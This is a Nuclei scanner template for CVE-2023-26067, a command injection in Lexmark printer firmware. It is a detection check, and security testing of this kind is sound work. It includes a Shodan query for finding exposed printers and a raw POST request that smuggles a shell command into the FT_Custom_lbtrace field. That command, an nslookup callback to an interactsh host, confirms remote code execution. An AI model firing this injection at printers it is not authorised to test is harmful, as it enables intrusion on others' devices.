id: CVE-2023-26067 info: name: Lexmark Printers - Command Injection author: DhiyaneshDK severity: high description: | Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4). remediation: | Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability. reference: - https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/ - https://github.com/horizon3ai/CVE-2023-26067 - https://nvd.nist.gov/vuln/detail/CVE-2023-26067 - https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf - https://support.lexmark.com/alerts/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2023-26067 cwe-id: CWE-20 epss-score: 0.02289 epss-percentile: 0.8846 cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: lexmark product: cxtpc_firmware shodan-query: "Server: Lexmark_Web_Server" tags: cve,cve2023,printer,iot,lexmark variables: cmd: 'nslookup {{interactsh-url}}' http: - raw: - | POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Length: 49 FT_Custom_lbtrace=$({{cmd}}) matchers: - type: dsl dsl: - contains(interactsh_protocol, 'dns') - contains(body, 'Fax Trace Settings') - status_code == 200 condition: and # digest: 4a0a004730450220675704f3fea58598548eafc1663e37affa669099e3278c90926b757668500bf8022100ddca0a827ee4e760886b6c0c04190e79dc1638528345440c00b52b3d55a21f4d:922c64590222798bb761d5b6d8e72950